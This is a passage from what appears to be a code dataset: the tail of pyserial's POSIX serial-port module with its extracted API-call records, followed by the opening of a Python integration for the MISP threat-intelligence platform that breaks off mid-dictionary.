to handle non standard baud rate on this platform") baudrate_constants = {} elif plat == 'openbsd3': # BSD (confirmed) def device(port): return '/dev/ttyp%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'bsd' or \ plat[:7] == 'freebsd' or \ plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d) def device(port): return '/dev/cuad%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:6] == 'darwin': # OS X version = os.uname()[2].split('.') # Tiger or above can support arbitrary serial speeds if int(version[0]) >= 8: def set_special_baudrate(port, baudrate): # use IOKit-specific call to set up high speeds import array, fcntl buf = array.array('i', [baudrate]) IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t) fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1) else: # version < 8 def set_special_baudrate(port, baudrate): raise ValueError("baud rate not supported") def device(port): return '/dev/cuad%d' % port baudrate_constants = {} elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk def device(port): return '/dev/dty%02d' % port def set_special_baudrate(port, 
baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:4] == 'irix': # IRIX (partially tested) def device(port): return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:2] == 'hp': # HP-UX (not tested) def device(port): return '/dev/tty%dp0' % (port+1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed) def device(port): return '/dev/tty%c' % (ord('a')+port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'aix': # AIX def device(port): return '/dev/tty%d' % (port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} else: # platform detection has failed... sys.stderr.write("""\ don't know how to number ttys on this system. ! Use an explicit path (eg /dev/ttyS1) or send this information to ! the author of this module: sys.platform = %r os.name = %r serialposix.py version = %s also add the device name of the serial port and where the counting starts for the first serial port. e.g. 'first serial port: /dev/ttyS0' and with a bit luck you can get this module running... """ % (sys.platform, os.name, VERSION)) # no exception, just continue with a brave attempt to build a device name # even if the device name is not correct for the platform it has chances # to work using a string with the real device name as port parameter. def device(portum): return '/dev/ttyS%d' % portnum def set_special_baudrate(port, baudrate): raise SerialException("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} #~ raise Exception, "this module does not run on this platform, sorry." # whats up with "aix", "beos", .... # they should work, just need to know the device names. # load some constants for later use. 
# try to use values from TERMIOS, use defaults from linux otherwise TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415 TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416 TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417 TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418 #TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001 TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002 TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004 #TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008 #TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010 TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020 TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040 TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080 TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100 TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG #TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000 #TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000 TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B TIOCM_zero_str = struct.pack('I', 0) TIOCM_RTS_str = struct.pack('I', TIOCM_RTS) TIOCM_DTR_str = struct.pack('I', TIOCM_DTR) TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427 TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428 class PosixSerial(SerialBase): """Serial port class POSIX implementation. Serial port configuration is done with termios and fcntl. Runs on Linux and many other Un*x like systems.""" def open(self): """Open port with current settings. 
This may throw a SerialException if the port cannot be opened.""" self.fd = None if self._port is None: raise SerialException("Port must be configured before it can be used.") # open try: self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK) except Exception as msg: self.fd = None raise SerialException("could not open port %s: %s" % (self._port, msg)) #~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking try: self._reconfigurePort() except: try: os.close(self.fd) except: # ignore any exception when closing the port # also to keep original exception that happened when setting up pass self.fd = None raise else: self._isOpen = True #~ self.flushInput() def _reconfigurePort(self): """Set communication parameters on opened port.""" if self.fd is None: raise SerialException("Can only operate on a valid file descriptor") custom_baud = None vmin = vtime = 0 # timeout is done via select if self._interCharTimeout is not None: vmin = 1 vtime = int(self._interCharTimeout * 10) try: iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd) except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here raise SerialException("Could not configure port: %s" % msg) # set up raw mode / no echo / binary cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD) lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL| TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk if hasattr(TERMIOS, flag): lflag &= ~getattr(TERMIOS, flag) oflag &= ~(TERMIOS.OPOST) iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK) if hasattr(TERMIOS, 'IUCLC'): iflag &= ~TERMIOS.IUCLC if hasattr(TERMIOS, 'PARMRK'): iflag &= ~TERMIOS.PARMRK # setup baud rate try: ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate)) except AttributeError: try: ispeed = ospeed = baudrate_constants[self._baudrate] except KeyError: #~ raise ValueError('Invalid baud rate: %r' % self._baudrate) # may need custom baud rate, it isn't in our list. ispeed = ospeed = getattr(TERMIOS, 'B38400') try: custom_baud = int(self._baudrate) # store for later except ValueError: raise ValueError('Invalid baud rate: %r' % self._baudrate) else: if custom_baud < 0: raise ValueError('Invalid baud rate: %r' % self._baudrate) # setup char len cflag &= ~TERMIOS.CSIZE if self._bytesize == 8: cflag |= TERMIOS.CS8 elif self._bytesize == 7: cflag |= TERMIOS.CS7 elif self._bytesize == 6: cflag |= TERMIOS.CS6 elif self._bytesize == 5: cflag |= TERMIOS.CS5 else: raise ValueError('Invalid char len: %r' % self._bytesize) # setup stopbits if self._stopbits == STOPBITS_ONE: cflag &= ~(TERMIOS.CSTOPB) elif self._stopbits == STOPBITS_ONE_POINT_FIVE: cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. 
there is no POSIX support for 1.5 elif self._stopbits == STOPBITS_TWO: cflag |= (TERMIOS.CSTOPB) else: raise ValueError('Invalid stop bit specification: %r' % self._stopbits) # setup parity iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP) if self._parity == PARITY_NONE: cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD) elif self._parity == PARITY_EVEN: cflag &= ~(TERMIOS.PARODD) cflag |= (TERMIOS.PARENB) elif self._parity == PARITY_ODD: cflag |= (TERMIOS.PARENB|TERMIOS.PARODD) else: raise ValueError('Invalid parity: %r' % self._parity) # setup flow control # xonxoff if hasattr(TERMIOS, 'IXANY'): if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY) else: if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF) # rtscts if hasattr(TERMIOS, 'CRTSCTS'): if self._rtscts: cflag |= (TERMIOS.CRTSCTS) else: cflag &= ~(TERMIOS.CRTSCTS) elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name if self._rtscts: cflag |= (TERMIOS.CNEW_RTSCTS) else: cflag &= ~(TERMIOS.CNEW_RTSCTS) # XXX should there be a warning if setting up rtscts (and xonxoff etc) fails?? # buffer # vmin "minimal number of characters to be read. = for non blocking" if vmin < 0 or vmin > 255: raise ValueError('Invalid vmin: %r ' % vmin) cc[TERMIOS.VMIN] = vmin # vtime if vtime < 0 or vtime > 255: raise ValueError('Invalid vtime: %r' % vtime) cc[TERMIOS.VTIME] = vtime # activate settings termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]) # apply custom baud rate, if any if custom_baud is not None: set_special_baudrate(self, custom_baud) def close(self): """Close port""" if self._isOpen: if self.fd is not None: os.close(self.fd) self.fd = None self._isOpen = False def makeDeviceName(self, port): return device(port) # - - - - - - - - - - - - - - - - - - - - - - - - def inWaiting(self): """Return the number of characters currently in the input buffer.""" #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str) s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str) return struct.unpack('I',s)[0] # select based implementation, proved to work on many systems def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() while len(read) < size: ready,_,_ = select.select([self.fd],[],[], self._timeout) # If select was used with a timeout, and the timeout occurs, it # returns with empty lists -> thus abort read operation. # For timeout == 0 (non-blocking operation) also abort when there # is nothing to read. if not ready: break # timeout buf = os.read(self.fd, size-len(read)) # read should always return some data as select reported it was # ready to read when we get to this point. if not buf: # Disconnected devices, at least on Linux, show the # behavior that they are always ready to read immediately # but reading returns nothing. 
raise SerialException('device reports readiness to read but returned no data (device disconnected?)') read.extend(buf) return bytes(read) def write(self, data): """Output the given string over the serial port.""" if self.fd is None: raise portNotOpenError t = len(data) d = data if self._writeTimeout is not None and self._writeTimeout > 0: timeout = time.time() + self._writeTimeout else: timeout = None while t > 0: try: n = os.write(self.fd, d) if timeout: # when timeout is set, use select to wait for being ready # with the time left as timeout timeleft = timeout - time.time() if timeleft < 0: raise writeTimeoutError _, ready, _ = select.select([], [self.fd], [], timeleft) if not ready: raise writeTimeoutError d = d[n:] t = t - n except OSError as v: if v.errno != errno.EAGAIN: raise SerialException('write failed: %s' % (v,)) return len(data) def flush(self): """Flush of file like objects. In this case, wait until all data is written.""" self.drainOutput() def flushInput(self): """Clear input buffer, discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCIFLUSH) def flushOutput(self): """Clear output buffer, aborting the current output and discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCOFLUSH) def sendBreak(self, duration=0.25): """Send break condition. Timed, returns to idle state after given duration.""" if self.fd is None: raise portNotOpenError termios.tcsendbreak(self.fd, int(duration/0.25)) def setBreak(self, level=1): """Set break: Controls TXD. When active, no transmitting is possible.""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCSBRK) else: fcntl.ioctl(self.fd, TIOCCBRK) def setRTS(self, level=1): """Set terminal status line: Request To Send""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str) def setDTR(self, level=1): """Set terminal status line: Data Terminal Ready""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str) def getCTS(self): """Read terminal status line: Clear To Send""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CTS != 0 def getDSR(self): """Read terminal status line: Data Set Ready""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_DSR != 0 def getRI(self): """Read terminal status line: Ring Indicator""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_RI != 0 def getCD(self): """Read terminal status line: Carrier Detect""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CD != 0 # - - platform specific - - - - def drainOutput(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError termios.tcdrain(self.fd) def nonblocking(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK) def fileno(self): """For easier use of the serial port instance with select. 
WARNING: this function is not portable to different platforms!""" if self.fd is None: raise portNotOpenError return self.fd def flowControl(self, enable): """manually control flow - when hardware or software flow control is enabled""" if enable: termios.tcflow(self.fd, TERMIOS.TCION) else: termios.tcflow(self.fd, TERMIOS.TCIOFF) # assemble Serial class with the platform specifc implementation and the base # for file-like behavior. for Python 2.6 and newer, that provide the new I/O # library, derrive from io.RawIOBase try: import io except ImportError: # classic version with our own file-like emulation class Serial(PosixSerial, FileLike): pass else: # io library present class Serial(PosixSerial, io.RawIOBase): pass class PosixPollSerial(Serial): """poll based read implementation. not all systems support poll properly. however this one has better handling of errors, such as a device disconnecting while it's in use (e.g. USB-serial unplugged)""" def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() poll = select.poll() poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL) if size > 0: while len(read) < size: # print "\tread(): size",size, "have", len(read) #debug # wait until device becomes ready to read (or something fails) for fd, event in poll.poll(self._timeout*1000): if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL): raise SerialException('device reports error (poll)') # we don't care if it is select.POLLIN or timeout, that's # handled below buf = os.read(self.fd, size - len(read)) read.extend(buf) if ((self._timeout is not None and self._timeout >= 0) or (self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf: break # early abort on timeout return bytes(read) if __name__ == '__main__': s = Serial(0, baudrate=19200, # baud rate bytesize=EIGHTBITS, # number of data bits parity=PARITY_EVEN, # enable parity checking stopbits=STOPBITS_ONE, # number of stop bits timeout=3, # set a timeout value, None for waiting forever xonxoff=0, # enable software flow control rtscts=0, # enable RTS/CTS flow control ) s.setRTS(1) s.setDTR(1) s.flushInput() s.flushOutput() s.write('hello') sys.stdout.write('%r\n' % s.read(5)) sys.stdout.write('%s\n' % s.inWaiting()) del s
[ "os.open", "fcntl.fcntl", "termios.tcflush", "select.poll", "termios.tcflow", "termios.tcdrain", "termios.tcsetattr", "FCNTL.ioctl", "os.uname", "select.select", "array.array", "os.close", "os.write", "struct.pack", "sys.stderr.write", "struct.unpack", "time.time", "sys.platform.lower", "fcntl.ioctl", "termios.tcgetattr" ]
[((909, 929), 'sys.platform.lower', 'sys.platform.lower', ([], {}), '()\n', (927, 929), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8255, 8274), 'struct.pack', 'struct.pack', (['"""I"""', '(0)'], {}), "('I', 0)\n", (8266, 8274), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8291, 8318), 'struct.pack', 'struct.pack', (['"""I"""', 'TIOCM_RTS'], {}), "('I', TIOCM_RTS)\n", (8302, 8318), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8335, 8362), 'struct.pack', 'struct.pack', (['"""I"""', 'TIOCM_DTR'], {}), "('I', TIOCM_DTR)\n", (8346, 8362), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((1178, 1204), 'array.array', 'array.array', (['"""i"""', '([0] * 32)'], {}), "('i', [0] * 32)\n", (1189, 1204), False, 'import array, fcntl\n'), ((1242, 1288), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCGSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCGSERIAL, buf)\n', (1253, 1288), False, 'import FCNTL\n'), ((14576, 14673), 'termios.tcsetattr', 'termios.tcsetattr', (['self.fd', 'TERMIOS.TCSANOW', '[iflag, oflag, cflag, lflag, ispeed, ospeed, cc]'], {}), '(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag,\n ispeed, ospeed, cc])\n', (14593, 14673), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15335, 15380), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCINQ', 'TIOCM_zero_str'], {}), '(self.fd, TIOCINQ, TIOCM_zero_str)\n', (15346, 15380), False, 'import array, fcntl\n'), ((18213, 18255), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCIFLUSH'], {}), '(self.fd, TERMIOS.TCIFLUSH)\n', (18228, 18255), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((18468, 18510), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCOFLUSH'], {}), '(self.fd, TERMIOS.TCOFLUSH)\n', (18483, 18510), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((19762, 19808), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (19773, 19808), False, 'import array, fcntl\n'), ((20007, 20053), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20018, 20053), False, 'import array, fcntl\n'), ((20251, 20297), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20262, 20297), False, 'import array, fcntl\n'), ((20494, 20540), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20505, 20540), False, 'import array, fcntl\n'), ((20759, 20783), 'termios.tcdrain', 'termios.tcdrain', (['self.fd'], {}), '(self.fd)\n', (20774, 20783), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20922, 20972), 'fcntl.fcntl', 'fcntl.fcntl', (['self.fd', 'FCNTL.F_SETFL', 'os.O_NONBLOCK'], {}), '(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)\n', (20933, 20972), False, 'import array, fcntl\n'), ((22494, 22507), 'select.poll', 'select.poll', ([], {}), '()\n', (22505, 22507), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((1505, 1551), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCSSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCSSERIAL, buf)\n', (1516, 1551), False, 'import FCNTL\n'), ((9036, 9098), 'os.open', 'os.open', (['self.portstr', '(os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)'], {}), '(self.portstr, os.O_RDWR | os.O_NOCTTY 
| os.O_NONBLOCK)\n', (9043, 9098), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((10218, 10244), 'termios.tcgetattr', 'termios.tcgetattr', (['self.fd'], {}), '(self.fd)\n', (10235, 10244), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15396, 15417), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (15409, 15417), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15862, 15909), 'select.select', 'select.select', (['[self.fd]', '[]', '[]', 'self._timeout'], {}), '([self.fd], [], [], self._timeout)\n', (15875, 15909), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((18955, 18985), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCSBRK'], {}), '(self.fd, TIOCSBRK)\n', (18966, 18985), False, 'import array, fcntl\n'), ((19012, 19042), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCCBRK'], {}), '(self.fd, TIOCCBRK)\n', (19023, 19042), False, 'import array, fcntl\n'), ((19212, 19257), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIS, TIOCM_RTS_str)\n', (19223, 19257), False, 'import array, fcntl\n'), ((19284, 19329), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIC, TIOCM_RTS_str)\n', (19295, 19329), False, 'import array, fcntl\n'), ((19503, 19548), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIS, TIOCM_DTR_str)\n', (19514, 19548), False, 'import array, fcntl\n'), ((19575, 19620), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIC, TIOCM_DTR_str)\n', (19586, 19620), False, 'import array, fcntl\n'), ((21377, 21415), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCION'], {}), '(self.fd, TERMIOS.TCION)\n', (21391, 21415), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((21442, 21481), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCIOFF'], {}), '(self.fd, TERMIOS.TCIOFF)\n', (21456, 21481), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((14924, 14941), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\n', (14932, 14941), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17064, 17075), 'time.time', 'time.time', ([], {}), '()\n', (17073, 17075), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17196, 17216), 'os.write', 'os.write', (['self.fd', 'd'], {}), '(self.fd, d)\n', (17204, 17216), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((9404, 9421), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\n', (9412, 9421), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17547, 17589), 'select.select', 'select.select', (['[]', '[self.fd]', '[]', 'timeleft'], {}), '([], [self.fd], [], timeleft)\n', (17560, 17589), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((19824, 19845), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (19837, 19845), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20069, 20090), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20082, 20090), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20313, 20334), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20326, 20334), False, 'import sys, os, fcntl, termios, struct, select, errno, 
time\n'), ((20556, 20577), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20569, 20577), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17416, 17427), 'time.time', 'time.time', ([], {}), '()\n', (17425, 17427), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((3798, 3826), 'array.array', 'array.array', (['"""i"""', '[baudrate]'], {}), "('i', [baudrate])\n", (3809, 3826), False, 'import array, fcntl\n'), ((3899, 3940), 'fcntl.ioctl', 'fcntl.ioctl', (['port.fd', 'IOSSIOSPEED', 'buf', '(1)'], {}), '(port.fd, IOSSIOSPEED, buf, 1)\n', (3910, 3940), False, 'import array, fcntl\n'), ((3527, 3537), 'os.uname', 'os.uname', ([], {}), '()\n', (3535, 3537), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((5714, 6179), 'sys.stderr.write', 'sys.stderr.write', (['("""don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))'], {}), '(\n """don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))\n', (5730, 6179), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n')]
# type: ignore from typing import Union, List, Dict from urllib.parse import urlparse import urllib3 from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute from pymisp.tools import GenericObjectGenerator import copy from pymisp.tools import FileObject from CommonServerPython import * logging.getLogger("pymisp").setLevel(logging.CRITICAL) def handle_connection_errors(error): if "SSLError" in error: return_error('Unable to connect to MISP because of a SSLCertVerificationError, ' 'Please try to use the Trust any certificate option.') if "NewConnectionError" in error: return_error('Unable to connect to MISP because of a NewConnectionError, ' 'Please make sure your MISP server url is correct.') if "Please make sure the API key and the URL are correct" in error: return_error('Unable to connect to MISP, ' 'Please make sure the API key is correct.') return_error(error) def warn(*args): """ Do nothing with warnings """ pass # Disable requests warnings urllib3.disable_warnings() # Disable python warnings warnings.warn = warn ''' GLOBALS/PARAMS ''' params = demisto.params() if not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')): raise DemistoException('Missing API Key. Fill in a valid key in the integration configuration.') MISP_URL = params.get('url') VERIFY = not params.get('insecure') PROXIES = handle_proxy() # type: ignore try: PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES) except PyMISPError as e: handle_connection_errors(e.message) PREDEFINED_FEEDS = { 'CIRCL': {'name': 'CIRCL OSINT Feed', 'url': 'https://www.circl.lu/doc/misp/feed-osint', 'format': 'misp', 'input': 'network'}, 'Botvrij.eu': {'name': 'The Botvrij.eu Data', 'url': 'http://www.botvrij.eu/data/feed-osint', 'format': 'misp', 'input': 'network'} } THREAT_LEVELS_TO_ID = { 'High': 1, 'Medium': 2, 'Low': 3, 'Unknown': 4 } MISP_ENTITIES_TO_CONTEXT_DATA = { 'deleted': 'Deleted', 'category': 'Category', 'comment': 'Comment', 'uuid': 'UUID', 'sharing_group_id': 'SharingGroupID', 'timestamp': 'LastChanged', 'to_ids': 'ToIDs', 'value': 'Value', 'event_id': 'EventID', 'ShadowAttribute': 'ShadowAttribute', 'disable_correlation': 'DisableCorrelation', 'distribution': 'Distribution', 'type': 'Type', 'id': 'ID', 'date': 'CreationDate', 'info': 'Info', 'published': 'Published', 'attribute_count': 'AttributeCount', 'proposal_email_lock': 'ProposalEmailLock', 'locked': 'Locked', 'publish_timestamp': 'PublishTimestamp', 'event_creator_email': 'EventCreatorEmail', 'name': 'Name', 'analysis': 'Analysis', 'threat_level_id': 'ThreatLevelID', 'old_id': 'OldID', 'org_id': 'OrganizationID', 'Org': 'Organization', 'Orgc': 'OwnerOrganization', 'orgc_uuid': 'OwnerOrganization.UUID', 'orgc_id': 'OwnerOrganization.ID', 'orgc_name': 'OwnerOrganization.Name', 'event_uuid': 'EventUUID', 'proposal_to_delete': 'ProposalToDelete', 'description': 'Description', 'version': 'Version', 'Object': 'Object', 'object_id': 'ObjectID', 'object_relation': 'ObjectRelation', 'template_version': 'TemplateVersion', 'template_uuid': 'TemplateUUID', 'meta-category': 'MetaCategory', 'decay_score': 'DecayScore', 'first_seen': 'first_seen', 'last_seen': 'last_seen', 'provider': 'Provider', 'source_format': 'SourceFormat', 'url': 'URL', 'event_uuids': 'EventUUIDS', } MISP_ANALYSIS_TO_IDS = { 'initial': 0, 'ongoing': 1, 'completed': 2 } MISP_DISTRIBUTION_TO_IDS = { 'Your_organization_only': 0, 